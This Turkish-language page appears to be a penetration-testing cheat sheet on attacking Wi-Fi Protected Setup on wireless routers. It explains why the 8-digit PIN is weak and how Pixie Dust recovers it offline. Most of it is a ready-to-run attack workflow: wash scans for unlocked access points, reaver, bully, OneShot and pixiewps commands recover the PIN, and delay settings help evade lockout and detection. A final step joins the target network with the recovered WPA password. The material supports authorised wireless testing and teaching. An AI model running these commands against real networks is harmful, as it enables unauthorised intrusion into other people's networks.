Skip to content

WPS Saldırıları

WPS difficulty: kolay-orta

Wi-Fi Protected Setup (WPS), 8 haneli bir PIN ile kolay bağlantı sunar ama tasarım zayıflıkları içerir. PIN iki yarıya (4+3 anlamlı hane + checksum) bölünüp doğrulandığından arama uzayı dramatik biçimde küçülür; ayrıca Pixie Dust saldırısı zayıf nonce/entropi kullanan AP’lerde PIN’i offline kırar. PIN bulununca AP genelde WPA2 PSK’yi açık metin verir.

8 hane → teorik 10^8
Pratik: 1. yarı 4 hane (10^4) ayrı doğrulanır
2. yarı 3 hane + checksum → ~10^3
Toplam deneme ~11.000 — online brute saatler/günler (rate limit ile)
Pixie Dust: nonce zayıfsa saniyeler–dakikalar, online PIN denemesi az
Terminal window
sudo wash -i wlan0mon
Terminal window
sudo wash -i wlan0mon -5 # 5 GHz
Terminal window
sudo wash -i wlan0mon -s # progressive scan
WPS: yes, Locked: No → saldırı adayı
Locked: Yes → bekle / başka AP; lock süresi dolunca tekrar
Manufacturer Broadcom/Ralink/Realtek eski firmware → Pixie şansı yüksek

airodump WPS sütunu göstermeyebilir; wash / wia-ng tercih edin.

reaver · WPS Pixie

embedded tool
Generated command
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv
  1. Pixie Dust (offline, ilk dene) — zayıf AP’lerde en hızlı yol:

    Terminal window
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv
    Terminal window
    sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -d -v 3
    Terminal window
    sudo python3 oneshot.py -i wlan0mon -b AA:BB:CC:DD:EE:FF -K
  2. PIN brute (online) — Pixie başarısızsa:

    Terminal window
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv -L -N -d 2
    Terminal window
    sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -v 3
  3. Bilinen/default PIN — bazı vendor PIN algoritmaları (BSSID’den türetilir):

    Terminal window
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p 12345670 -vv
  4. Sonuç — geçerli PIN + WPA PSK log’da görünür; ağa bağlan:

    Terminal window
    sudo nmcli dev wifi connect "TargetSSID" password 'PSK_HERE'
Terminal window
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv -s
Terminal window
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv -d 5 -t 10 -T 5
Terminal window
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv -A

Aynı kanalda airodump açık tutmak sinyal/ilişki için yardımcı olabilir.

Terminal window
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '' -vv
WPS lock after N fails → -d ile yavaşlat; -L riskli (tespit)
EAPOL timeout → mesafe/kanal; -t /-T artır
AP reboot unlock → uzun soluklu test; gece bırak
Terminal window
watch -n 60 'wash -i wlan0mon | grep -i aabbccddeeff'
1) Farklı tool: bully / OneShot / pixiewps manuel
2) Online PIN brute (sabır + delay)
3) Vendor default PIN veritabanı
4) WPS kapatılmış say → handshake / PMKID'e dön
Terminal window
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <enonce>
wash → Unlocked WPS
→ reaver -K 1 (Pixie)
→ PSK → nmcli connect → iç ağ
Pixie fail → reaver online -d 5
→ PIN + PSK → veya timeout → PMKID/handshake